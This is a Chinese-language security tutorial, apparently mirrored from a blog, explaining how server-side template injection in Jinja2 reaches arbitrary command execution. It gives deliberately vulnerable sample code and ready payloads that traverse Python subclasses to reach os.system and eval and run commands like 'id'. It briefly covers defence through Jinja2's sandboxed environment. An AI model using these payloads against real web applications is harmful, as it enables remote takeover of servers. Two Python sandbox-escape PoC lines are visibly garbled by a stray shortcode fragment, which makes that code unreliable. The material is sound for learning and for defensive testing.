013-利用 Python 特性在 Jinja2 模板中执行任意代码.md
7.52 KB / 2021-07-17 00:01:38
# 利用 Python 特性在 Jinja2 模板中执行任意代码
0x00 简介
=======
* * *
本文源于老外[@nvisium](https://twitter.com/nvisium)在其博客发表的博文[《Injecting Flask》](https://nvisium.com/blog/2015/12/07/injecting-flask/),在原文中作者讲解了 Python 模板引擎[Jinja2](http://jinja.pocoo.org/)在服务端模板注入 (SSTI) 中的具体利用方法,在能够控制模板内容时利用环境变量中已注册的用户自定义函数进行恶意调用或利用渲染进行 XSS 等。
对于 Jinja2 模板引擎是否能够在 SSTI 的情况下直接执行命令原文并没有做出说明,并且在 Jinja2 官方文档中也有说明,模板中并不能够直接执行任意 Python 代码,这样看来在 Jinja2 中直接控制模板内容来执行 Python 代码或者命令似乎不太可能。
0x01 模板中复杂的代码执行方式
=================
* * *
最近在进行项目开发时无意中注意到 Jinja2 模板中可以访问一些 Python 内置变量,如`[]``{}`等,并且能够使用 Python 变量类型中的一些函数,示例代码一如下:
```
# coding: utf-8
import sys
from jinja2 import Template
template = Template("Your input: {}".format(sys.argv[1] if len(sys.argv) > 1 else '<empty>'))
print template.render()
```
为了方便演示,这里直接将命令参数输入拼接为模板内容的一部分并进行渲染输出,这里我们直接输入`{{ 'abcd' }}`使模板直接渲染字符串变量:
![](http://drops.javaweb.org/uploads/images/189b9c98f3a7574af4185dc9128e150e3b21deed.jpg)
当然上面说了可以在模板中直接调用变量实例的函数,如字符串变量中的`upper()`函数将其字符串转换为全大写形式:
![](http://drops.javaweb.org/uploads/images/f84ff357dbde48900671426c281c9154f7855c1e.jpg)
那么如何在 Jinja2 的模板中执行 Python 代码呢?如官方的说法是需要在模板环境中注册函数才能在模板中进行调用,例如想要在模板中直接调用内置模块`os`,即需要在模板环境中对其注册,示例代码二如下:
```
# coding: utf-8
import os
import sys
from jinja2 import Template
template = Template("Your input: {}".format(sys.argv[1] if len(sys.argv) > 1 else '<empty>'))
template.globals['os'] = os
print template.render()
```
执行代码,并传入参数`{{ os.popen('echo Hello RCE').read() }}`,因为在模板环境中已经注册了`os`变量为 Python`os`模块,所以可以直接调用模块函数来执行系统命令,这里执行额系统命令为`echo Hello Command Exection`:
![](http://drops.javaweb.org/uploads/images/e1aff19ac21be11e7d05daa76b908223fa675d2a.jpg)
如果使用示例代码一来执行,会得到`os`未定义的异常错误:
![](http://drops.javaweb.org/uploads/images/7cdc456d00f6f1930266a2d0e1035c23b3a3511d.jpg)
0x02 利用 Python 特性直接执行任意代码
=========================
* * *
那么,如何在未注册`os`模块的情况下在模板中调用`popen()`函数执行系统命令呢?前面已经说了,在 Jinja2 中模板能够访问 Python 中的内置变量并且可以调用对应变量类型下的方法,这一特点让我联想到了常见的 Python 沙盒环境逃逸方法,如 2014CSAW-CTF 中的一道 Python 沙盒绕过题目,环境代码如下:
```
#!/usr/bin/env python
from __future__ import print_function
print("Welcome to my Python sandbox! Enter commands below!")
banned = [
"import",
"exec",
"eval",
"pickle",
"os",
"subprocess",
"kevin sucks",
"input",
"banned",
"cry sum more",
"sys"
]
targets = __builtins__.__dict__.keys()
targets.remove('raw_input')
targets.remove('print')
for x in targets:
del __builtins__.__dict__[x]
while 1:
print(">>>", end=' ')
data = raw_input()
for no in banned:
if no.lower() in data.lower():
print("No bueno")
break
else: # this means nobreak
exec data
```
(利用 Python 特性绕过沙盒限制的详细讲解请参考[Writeup](https://hexplo.it/escaping-the-csawctf-python-sandbox/)),这里给出笔者改进后的 PoC:
```
[c 1="c" 2="in" 3="[" language="for"][/c].__class__.__base__.__subclasses__() if c.__name__ == 'catch_warnings'][0].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('echo Hello SandBox')
```
![](http://drops.javaweb.org/uploads/images/2bf5149aff34597eec7d75b54f6dc68f6d778d5d.jpg)
当然通过这种方式不仅仅能够通过`os`模块来执行系统命令,还能进行文件读写等操作,具体的代码请自行构造。
回到如何在 Jinja2 模板中直接执行代码的问题上,因为模板中能够访问 Python 内置的变量和变量方法,并且还能通过 Jinja2 的模板语法去遍历变量,因此可以构造出如下模板 Payload 来达到和上面 PoC 一样的效果:
```
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{{ c.__init__.func_globals['linecache'].__dict__['os'].system('id') }}
{% endif %}
{% endfor %}
```
使用该 Payload 作为示例代码二的执行参数,最终会执行系统命令`id`:
![](http://drops.javaweb.org/uploads/images/0053a807c5205d989642abbb63b591838ded7910.jpg)
当然除了遍历找到`os`模块外,还能直接找回`eval`函数并进行调用,这样就能够调用复杂的 Python 代码。
原始的 Python PoC 代码如下:
```
[a for a in [b for b in [c 1="c" 2="in" 3="[" language="for"][/c].__class__.__base__.__subclasses__() if c.__name__ == 'catch_warnings'][0].__init__.func_globals.values() if type(b) == dict] if 'eval' in a.keys()][0]['eval']('__import__("os").popen("whoami").read()')
```
在 Jinja2 中模板 Payload 如下:
```
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.func_globals.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
```
使用该 Payload 作为示例代码二的执行参数(注意引号转义),成功执行会使用`eval()`函数动态载入`os`模块并执行命令:
![](http://drops.javaweb.org/uploads/images/0623ba104a4dcb0856bebf5758c42ade09109a7b.jpg)
0x03 利用途径和防御方法
==============
* * *
SSTI(服务端模板注入)。通过 SSTI 控制 Web 应用渲染模板(基于 Jinja2)内容,可以轻易的进行远程代码(命令)执行。当然了,一切的前提都是模板内容可控,虽然这种场景并不常见,但难免会有程序员疏忽会有特殊的需求会让用户控制模板的一些内容。
在 Jinja2 模板中防止利用 Python 特性执行任意代码,可以使用 Jinja2 自带的沙盒环境`jinja2.sandbox.SandboxedEnvironment`,Jinja2 默认沙盒环境在解析模板内容时会检查所操作的变量属性,对于未注册的变量属性访问都会抛出错误。
![](http://drops.javaweb.org/uploads/images/e959fbd269e90501a416357afa2da773583c33de.jpg)
0x04 参考
=======
* * *
* [https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
* [https://nvisium.com/blog/2015/12/07/injecting-flask/](https://nvisium.com/blog/2015/12/07/injecting-flask/)
* [https://hexplo.it/escaping-the-csawctf-python-sandbox/](https://hexplo.it/escaping-the-csawctf-python-sandbox/)